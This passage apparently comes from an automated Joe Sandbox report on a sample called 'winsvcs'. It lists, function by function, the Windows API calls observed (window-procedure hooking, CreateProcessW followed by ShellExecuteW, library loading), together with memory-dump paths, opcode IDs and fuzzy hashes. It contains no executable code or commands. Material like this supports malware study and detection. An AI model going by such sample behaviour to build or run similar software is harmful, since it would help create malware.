                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211D570A41B11DFE710DF36A905B5EBBF0AF04314F50556FE89992390CB789900CB6C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00413821
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041382F
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00413862
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 004138AC
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 004138B6
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004138C2
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 0041394F
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041395D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2416140278-0
                                                                                                                                                                                                                          • Opcode ID: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
                                                                                                                                                                                                                          • Instruction ID: 53fdc4dda89daccb099a69e9506e87e8d6b252ccccbd8fdd27d7c1450a31b40a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451B5702047009BD7305F25DC48B67BBE5FF44715F048A2EF4AA822E1D7B4AE41C718
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2083054645-0
                                                                                                                                                                                                                          • Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 004020BC
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?), ref: 004020CF
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004020E5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateExecuteProcessShellSleepmemset
                                                                                                                                                                                                                          • String ID: D$open
                                                                                                                                                                                                                          • API String ID: 541629773-2491301029
                                                                                                                                                                                                                          • Opcode ID: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
                                                                                                                                                                                                                          • Instruction ID: 244d5e96a176da2f0eb505dfe5489d13d208d1740a25dc0715168ccfed983adf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D015E71784348BAEB604BE4DD0AFDA7BB8AB08B00F100022F701BE0D0D6F5A0459B6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0042B561
                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 0042B57B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 876702719-0
                                                                                                                                                                                                                          • Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,00000000,00000000,?), ref: 00418F91
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,80070057), ref: 00418FA9
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00418FDB
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00419018
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _memcpy_slstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2392212498-0
                                                                                                                                                                                                                          • Opcode ID: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
                                                                                                                                                                                                                          • Instruction ID: 48a8b0cc39821948161f5f9393556796c921f6ff3b7309816e02544d4b83d9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B3106B16042119FE730AF22EC81A777BA8EB95314F14483EF98582211EA7AEC81C759
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00414EF5
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00414F37
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00414F45
                                                                                                                                                                                                                          • FillRect.USER32(?,?,00000006), ref: 00414F63
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ObjectRect$ClientDeleteFillSelect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3522820569-0
                                                                                                                                                                                                                          • Opcode ID: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
                                                                                                                                                                                                                          • Instruction ID: 865ed62e204f999886674634bdac8c5fb271fad3e2ed5c8a8075e854c35c8e72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43182762043029FD3109B28EC48BA7BBB9FFD4311F04552AF94986320DB76DC91CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411A19
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00411A29
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411A4A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00411A8E
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411A98
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000004,?), ref: 00411AA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3823208529-0
                                                                                                                                                                                                                          • Opcode ID: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
                                                                                                                                                                                                                          • Instruction ID: 37a676f5cb27032d0318369953a16ba400cad8c49294232363eb4eb626f908f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821A132301310AFD7208FA5D8C4A27BFA4FF48714B08896AEA498B211C774EC41CB75
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411F59
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00411F69
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411F8A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00411FCE
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411FD8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00411FE5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3823208529-0
                                                                                                                                                                                                                          • Opcode ID: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
                                                                                                                                                                                                                          • Instruction ID: 12e269af356ffb42e89dcecac3084760c7acb0868c2f02fce1b83a7edaf6f50e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA219232304310AFD7209FA5EDC4E27BBA4FB487147188A6AEE498B266C775DC41CB75
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ClientToScreen.USER32(?), ref: 00415827
                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00415839
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00415842
                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00415850
                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00415860
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00415884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientScreen$MoveParentWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2420994850-0
                                                                                                                                                                                                                          • Opcode ID: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
                                                                                                                                                                                                                          • Instruction ID: cb2595f71ca4477885d93d82fefb541c649833f727a180719ed1214593514184
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B214C72104202AFD701DF55DC84AABFBE8FF88350F04892DF98887260D771AC51CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __CreateFrameInfo.LIBCMT ref: 004290ED
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004290F7
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429105
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429113
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042911E
                                                                                                                                                                                                                          • _CallCatchBlock2.LIBCMT ref: 00429144
                                                                                                                                                                                                                            • Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1602911419-0
                                                                                                                                                                                                                          • Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32 ref: 0041525D
                                                                                                                                                                                                                            • Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041541E
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041542B
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00415454
                                                                                                                                                                                                                          • CreateAcceleratorTableA.USER32(?,00000001), ref: 0041549D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientRect$AcceleratorAttributesCreateCriticalInitializeLayeredParentSectionTableWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3375822417-0
                                                                                                                                                                                                                          • Opcode ID: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
                                                                                                                                                                                                                          • Instruction ID: 6c39a8f56b411056154fd32cd0cf0432356b21fcc375bf42b615943a6af84bd3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45A10271605B01DFD750CF29C484B9ABBE0FF88714F148A6EE8899B351D7B5E881CB86
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 00418E26
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00418E87
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D
                                                                                                                                                                                                                            • Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                            • Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                            • Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ByteCharEnterErrorFreeHeapLastLeaveMultiWide___sbh_find_block___sbh_free_block__lock_malloclstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2649083834-0
                                                                                                                                                                                                                          • Opcode ID: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
                                                                                                                                                                                                                          • Instruction ID: ef69da5e920178eb1dcc70a03244176e842f214767484c64cd14ef8785300be5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E41E271B002159BDB048EA89C80BAB77669B94314F04827EFD18DB391DE78DD4587C9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00410127
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 004100D5
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 0041014F
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 0041018C
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 004101D7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2104318304-0
                                                                                                                                                                                                                          • Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2896116776-0
                                                                                                                                                                                                                          • Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,00415A10,?,?,?,00000001), ref: 00416F26
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2734777837-0
                                                                                                                                                                                                                          • Opcode ID: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
                                                                                                                                                                                                                          • Instruction ID: bf3b8484ead40ab7a99336afcf803f5614de82c4d018cbf0b84b9aed1ee85005
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF418F70208200AFDF049F64D888BA67BA9FF49304F1945A9FD49CA2A6D774DC45CF25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00416DD9
                                                                                                                                                                                                                          • IsChild.USER32(?,00000000), ref: 00416DE3
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00416DF2
                                                                                                                                                                                                                          • SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus$ChildWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 501040988-0
                                                                                                                                                                                                                          • Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00423D76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 354369530-0
                                                                                                                                                                                                                          • Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?), ref: 00411EA9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00411EBD
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00411ED4
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00411EEE
